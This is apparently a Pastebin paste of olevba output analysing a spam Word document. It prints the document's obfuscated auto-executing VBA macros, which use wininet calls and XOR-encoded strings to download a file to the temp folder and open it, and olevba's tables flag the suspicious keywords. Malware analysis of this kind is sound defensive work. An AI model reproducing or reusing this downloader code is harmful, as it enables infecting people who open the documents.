Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MASIHB- spam.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: spam.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: spam.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub NORMAND(DEANDRE As Long)
- HARRIS
- End Sub
- Sub autoopen()
- NORMAND (378)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO PERCY.bas
- in file: spam.doc - OLE stream: u'Macros/VBA/PERCY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function LUCIO(LUCIANO As Long, LINDSEY As String, SCOTTIE As String) As String
- LUCIANO = LUCIANO * 2
- LUCIO = SEYMOUR(LINDSEY, SCOTTIE)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO CLAY.bas
- in file: spam.doc - OLE stream: u'Macros/VBA/CLAY'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal EMILE As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As LongPtr
- #End If
- Public Function GERMAN(ByRef WILMER As String, ByRef GIOVANNI As Long) As Integer
- GERMAN = Val("&H" & (BERNIE(62, WILMER, FLETCHER(GIOVANNI), 2)))
- End Function
- Public Function FLETCHER(ByRef GIOVANNI As Long) As Long
- FLETCHER = (2 * GIOVANNI) - 1
- End Function
- Public Function SEYMOUR(HERSCHEL As String, WILMER As String) As String
- Dim NUMBERS As Integer
- Dim BUFORD As Integer
- Dim SANFORD As Long
- SANFORD = 221
- If SANFORD > SANFORD * 4 Then End
- Dim GIOVANNI As Long
- Dim BARNEY As String
- For GIOVANNI = 1 To (LEOPOLDO(WILMER) / 2)
- NUMBERS = GERMAN(WILMER, GIOVANNI)
- BUFORD = LAVERNE(HERSCHEL, GIOVANNI)
- BARNEY = BARNEY + BRANDEN(NUMBERS, BUFORD)
- Next GIOVANNI
- SEYMOUR = BARNEY
- End Function
- Public Sub HARRIS()
- Dim BERT As Double
- Dim SILAS As Double
- For SILAS = 67 To 68
- SILAS = SILAS + 99
- Next SILAS
- FREDERIC (5.09)
- End Sub
- Public Function MERRILL(MERLIN As String)
- Dim IRWIN As String
- IRWIN = "KIRBY"
- RODRICK 44 + 0.33
- IRWIN = IRWIN + "CRUZ"
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO ROLANDO.bas
- in file: spam.doc - OLE stream: u'Macros/VBA/ROLANDO'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const PARKER = "1C2420212D60133536392E2A2E412A2022"
- Public Const LEMUEL = "13362C2A2C2F606B737B22312A"
- Public Const LAVERN = "2738313D7B617D33293C372A205B202A3E2B3E6F2D3D286963756676077461293D28"
- Public Const JULES = "1C2F3724313A3B2B217B0120235010363F31282C01302F233633"
- Public Const ELISEO = "COLEMANREFUGIO5"
- Public Function VALENTIN(WYATT As Long, ByVal MARQUIS As String) As Boolean
- #If VBA7 And Win64 Then
- Dim LANNY As LongPtr, EZRA As LongPtr
- #Else
- Dim LANNY As Long, EZRA As Long
- #End If
- Dim SYDNEY As Long
- Dim RUBIN As String * EFREN, EMILE As String
- Dim ARON As Integer, ELMO As Double
- LANNY = EFRAIN
- If LANNY = 0 Then
- Exit Function
- End If
- Dim KAREEM As Boolean
- If JAMAR(EZRA, LANNY) Then
- End If
- If EZRA = 0 Then
- ELMO = 0
- Else
- BORIS EZRA, RUBIN, EFREN, SYDNEY
- EMILE = RUBIN
- Dim GAIL As Long
- GAIL = 0
- GAIL = GAIL + 21
- If GAIL > GAIL + 44 Then End
- Do While SYDNEY <> 0
- BORIS EZRA, RUBIN, EFREN, SYDNEY
- EMILE = EMILE + Mid(RUBIN, 1, SYDNEY)
- Loop
- ELMO = LEOPOLDO(EMILE): _
- ARON = EVERETTE("JOSEF")
- Open MARQUIS _
- For Binary Access Write _
- Lock Write As #ARON
- Put #ARON, , EMILE
- GAIL = GAIL + 62
- If GAIL < 0 Then End
- Close #ARON
- End If
- DORIAN EZRA
- DORIAN LANNY
- EMILE = ""
- If ELMO Then
- VALENTIN = True
- End If
- End Function
- Public Function RODRICK(REINALDO As Double)
- Dim LUCIO As Object
- Dim JERROD As Long
- For JERROD = 17 To 21
- JERROD = JERROD + 33
- Next JERROD
- Dim WESTON As Object
- For JERROD = 11 To 21
- JERROD = JERROD + 64
- Next JERROD
- Set WESTON = LAURENCE
- JERROD = JERROD + 42
- Dim LEWIS As Boolean
- If JERROD > JERROD * 3 Then End
- LEWIS = HERSHEL(LUCIO, WESTON)
- REINALDO = REINALDO + 35
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Write | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Put | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Binary | May read or write a binary file (if |
- | | | combined with Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- +------------+-------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO CORNELIUS.bas
- in file: spam.doc - OLE stream: u'Macros/VBA/CORNELIUS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Option Explicit
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function BORIS Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As LongPtr, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
- #End If
- Public Const EFREN = 4800
- Public Const ANTWAN As String = "NIGEL"
- Public Const ALDEN = 1
- Public Const MARGARITO = &H4000000
- Sub FREDERIC(SANTOS As Double)
- MERRILL ("BLAIRLANDON")
- End Sub
- Public Function BRANDEN(ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String
- BRANDEN = Chr(NUMBERS Xor BUFORD)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Xor | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO LAMAR.bas
- in file: spam.doc - OLE stream: u'Macros/VBA/LAMAR'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Const JASPER = "RUSSEL"
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function EUGENIO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As LongPtr, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As LongPtr
- #Else
- Public Declare Function DORIAN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As Long) As Long
- Public Declare Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal EMILE As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As Long
- Public Declare Function BORIS Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As Long, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
- Public Declare Function EUGENIO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As Long, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As Long
- #End If
- Public Function LAVERNE(ByRef HERSCHEL As String, ByRef GIOVANNI As Long) As Integer
- LAVERNE = Asc(BERNIE(71, HERSCHEL, ((GIOVANNI Mod LEOPOLDO(HERSCHEL)) + 1), 1))
- End Function
- Public Function BERNIE(SAMMY As Long, ByRef JAYSON As String, ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String
- BERNIE = Mid$(JAYSON, NUMBERS, BUFORD)
- SAMMY = SAMMY + 31
- End Function
- #If VBA7 _
- And Win64 Then
- Public Function EFRAIN() As LongPtr
- #Else
- Public Function EFRAIN() As Long
- #End If
- EFRAIN = SAMMIE(ANTWAN, ALDEN, vbNullString, vbNullString, 0)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | IOC | wininet.dll | Executable file name |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO DEXTER.bas
- in file: spam.doc - OLE stream: u'Macros/VBA/DEXTER'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function LAURENCE() As Object
- Dim ISMAEL As String
- ISMAEL = SEYMOUR(ELISEO, JULES)
- Set LAURENCE = CreateObject(ISMAEL)
- End Function
- Public Function LEOPOLDO(JAYSON As String) As Long
- LEOPOLDO = Len(JAYSON)
- End Function
- Public Function JAMEL(ByRef LAZARO As Object, ByRef ALPHONSE As String, RANDELL As Double) As Boolean
- Set MAJOR = CreateObject _
- (SEYMOUR _
- (ELISEO, PARKER))
- Dim DUSTY As Integer
- DUSTY = MAJOR.Open(LAZARO & ALPHONSE)
- End Function
- #If VBA7 And Win64 Then
- Public Function JAMAR(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
- #Else
- Public Function JAMAR(ByRef GRADY As Long, NOAH As Long) As Boolean
- #End If
- Dim JACQUES As Double
- Dim GUADALUPE As String
- Dim CLARK As Long
- GUADALUPE = LUCIO(893, ELISEO, LAVERN)
- For JACQUES = 14 To 15
- JACQUES = JACQUES + 5.5
- Next JACQUES
- GRADY = EUGENIO(NOAH, GUADALUPE, vbNullString, 0, MARGARITO, 0)
- JAMAR = True
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+--------------------------+
- | Type | Keyword | Description |
- +------------+--------------+--------------------------+
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Open | May open a file |
- +------------+--------------+--------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO AMOS.bas
- in file: spam.doc - OLE stream: u'Macros/VBA/AMOS'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 And Win64 Then
- Public Declare PtrSafe Function DORIAN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As LongPtr) As Long
- #End If
- Public Function HERSHEL(ByRef LAZARO As Object, ByRef HOMER As Object) As Boolean
- Dim HARRISON As Long
- Set LAZARO = IGNACIO(LAURENCE)
- Dim ADOLFO
- Dim ALPHONSE As String
- ALPHONSE = LUCIO(4096, ELISEO, LEMUEL)
- For HARRISON = 6 To 8
- HARRISON = HARRISON * 55
- Next HARRISON
- ADOLFO = LAZARO & ALPHONSE
- If VALENTIN(354, ADOLFO) Then
- End If
- HERSHEL = JAMEL(LAZARO, ALPHONSE, 213)
- End Function
- Public Function EVERETTE(JAYSON As String) As Integer
- EVERETTE = FreeFile
- End Function
- Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
- Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+-------------+-------------------------+
- | Type | Keyword | Description |
- +------------+-------------+-------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | IOC | wininet.dll | Executable file name |
- +------------+-------------+-------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement